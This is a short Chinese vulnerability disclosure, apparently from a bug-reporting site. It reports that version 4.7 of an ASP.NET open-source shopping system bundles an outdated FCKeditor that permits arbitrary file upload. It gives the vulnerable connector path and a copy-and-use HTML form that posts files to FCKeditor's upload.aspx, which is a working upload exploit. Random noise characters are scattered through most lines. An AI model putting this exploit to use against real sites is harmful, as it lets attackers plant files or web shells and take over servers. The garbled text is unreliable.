披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
6 K: e5 i3 t# n$ c. ?! u# @ 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开, Y$ i0 u$ Z$ q
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
$ X9 C' G8 Y& h! q2 v 详细说明:其他版本我没测试,估计也是一样的问题" \3 n, ?5 w% ?1 j
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx# O4 ^. }* r6 S, q/ ~0 B! ]& W& {
跳转到网站根目录上传任意文件。
5 {# M' y* `6 s3 @( G5 q) N% Y2 P 漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
6 k# `( u& X, ^3 y6 D8 H d4 j <form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">+ d& ]0 V u) K. _) V3 {
Upload a new file:<br>( A& `9 u$ Y" F$ m; [
<input type="file" name="NewFile" size="50"><br>
3 a% \2 j( d# a! p <input id="btnUpload" type="submit" value="Upload">0 Y1 I# p, K) W( h
</form> |